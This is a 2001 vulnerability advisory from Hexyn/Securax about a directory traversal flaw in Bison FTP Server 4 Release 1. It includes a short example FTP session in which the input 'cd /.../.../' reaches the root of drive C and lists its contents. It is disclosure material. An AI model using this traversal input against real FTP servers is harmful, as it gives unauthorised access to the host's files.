Related information

Directory traversal in multiple FTP servers

Vulnerability for Platinum FTP version 1.0.11

[immune advisory] Mulitple vulnerabilities found in BisonFTP

Directory traversal vulnerabilities found in NITE ftp-server version 1.83

Vulnerabilties in Xynph FTP Server 1.0

From:	HEXYN
Date:	14.05.2001
Subject:	Hexyn / Securax Advisory #17 - Bison FTP Server Directory Traversal

Hexyn / Securax Advisory #17 - Bison FTP Server Directory Traversal

Topic: Bison FTP Server Directory Traversal
Announced: 2001-02-17
Affects: Bison FTP Server version 4 Release 1

DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN  BASED  UPON   TRIAL  AND  ERROR  RESULTS.
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS  100%  CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT  PRIOR  NOTICE.

THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL
COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS
BE CORRECT.

I. Problem Description
**********************
Bison FTP Server is an FTP server for Windows 9x/NT. A bug  allows  any
user to change to any directory.

II. Impact
**************
When sending the command "CWD ..." (or "cd ..." in the default UNIX FTP
client), the server will go one directory up.

Example:
--------

<snip>
230 User anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /.../.../
250 CWD command successful.
ftp> ls
200 PORT command successful.
150  Opening ASCII mode data connection for /.
<directory listing of c:\>
ftp> quit
221 Bye.

III. Solution
*************
At this time, no patch is available yet.

IV. Credits
***********
Bug discovered by t-Omicr0n <omicr0n@themail.com>

Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone
at #securax@irc.hexyn.be

-- t-Omicr0n @ http://t-Omicr0n.hexyn.be